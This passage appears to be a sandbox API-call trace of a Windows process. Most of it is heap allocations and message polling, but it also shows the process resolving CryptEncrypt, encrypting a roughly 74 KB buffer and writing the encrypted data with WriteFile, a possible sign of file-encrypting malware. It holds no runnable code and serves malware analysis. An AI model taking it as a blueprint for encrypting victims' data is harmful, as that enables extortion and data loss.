[0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.486] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.486] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.487] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73980 | out: hHeap=0x2af0000) returned 1 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.487] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.488] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.488] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0209.488] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0209.488] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0209.488] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0209.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.488] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.489] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.489] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0209.489] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0209.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0209.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d22e0 | out: hHeap=0x2af0000) returned 1 [0209.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0209.492] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0209.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0209.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab398, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.493] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x12289, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x12290) returned 1 [0209.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.493] CharLowerBuffW (in: lpsz="byte[74384]", cchLength=0xb | out: lpsz="byte[74384]") returned 0xb [0209.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.496] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.496] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.496] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.497] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0209.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab278, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0209.497] CryptEncrypt (in: hKey=0x9e2138, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d22e0*, pdwDataLen=0x8cef60*=0x12289, dwBufLen=0x12290 | out: pbData=0x37d22e0*, pdwDataLen=0x8cef60*=0x12290) returned 1 [0209.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.500] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0209.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.500] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0209.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.500] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0209.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.500] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0209.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.500] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.500] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.500] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.500] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.507] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.509] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x12290, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x12290, lpOverlapped=0x0) returned 1 [0209.511] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.511] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.511] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0209.511] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.511] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: 